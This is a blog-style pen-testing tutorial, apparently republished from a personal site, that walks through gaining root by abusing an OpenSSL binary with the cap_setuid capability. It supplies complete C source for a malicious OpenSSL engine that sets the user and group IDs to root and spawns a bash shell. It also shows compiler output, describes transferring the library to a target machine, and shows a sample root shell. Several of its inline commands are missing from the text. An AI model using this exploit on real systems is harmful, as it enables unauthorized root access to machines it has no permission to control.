How to: OpenSSL cap_setuid+ep PrivEsc Exploit

Priviledge Escalation to root user in 7 easy steps.

OpenSSL image with a lock on it

how-to

Priviledge Escalate to root using a cap_setuid capability in OpenSSL.

Consider the binary has capabilities set as: Is there a way to become root from a normal user by using this?

YES! Let’s explore how.

0. Checklist: Will It Work For Me?

Search all the binaries’ capibilities using: .

  • is the tool we will use
  • is the recursive flag
  • directs the standard error stream to

If you see , we are set for success.

1. Requirements (On Your System)

  1. We will use header in our exploit engine file. On debian based systems, use: to install.
  2. gcc

2. Getting The Exploit Ready

Create a file named with contents as such:

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id)
{
setuid(0); setgid(0);
system("/bin/bash");
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()

Check the [2] reference for more information.

3. Compiling

Run the following:

Output for 1:

┌──(kali㉿kali)-[/tmp]
└─$ gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
openssl-exploit-engine.c: In function ‘bind’:
openssl-exploit-engine.c:5:3: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
5 | setuid(0); setgid(0);
| ^~~~~~
openssl-exploit-engine.c:5:14: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
5 | setuid(0); setgid(0);
| ^~~~~~

It is safe to ignore warnings here. Resultant is the file.

4. Transferring the file

Using 's http server, and or on the target machine, we can transfer the file.

  1. [on your machine] start up python3 server in the directory where you have the file, as such: . this starts the server on port 80.
  2. [on target machine] use wget or curl the file as such:

5. Root (Finally!)

Once you have the file, run the following, at the location of the so file.

Sample output

user@server:~$ openssl req -engine ./openssl-exploit-engine.so root@server:~# whoami 
root

Enjoy!

6. Common Errors

┌──(kali㉿kali)-[/tmp]
└─$ gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
openssl-exploit-engine.c:1:10: fatal error: openssl/engine.h: No such file or directory
1 | #include <openssl/engine.h>
| ^~~~~~~~~~~~~~~~~~
compilation terminated.If you get this error, check the section on Requirements.

7. References

  1. Read up more on capabilities.
  2. OpenSSL building a useless engine
  3. How to use the library load feature OpenSSL

Originally published at https://chaudhary1337.github.io on June 17, 2021.

Breaking in Pen-Testing

Love podcasts or audiobooks? Learn on the go with our new app.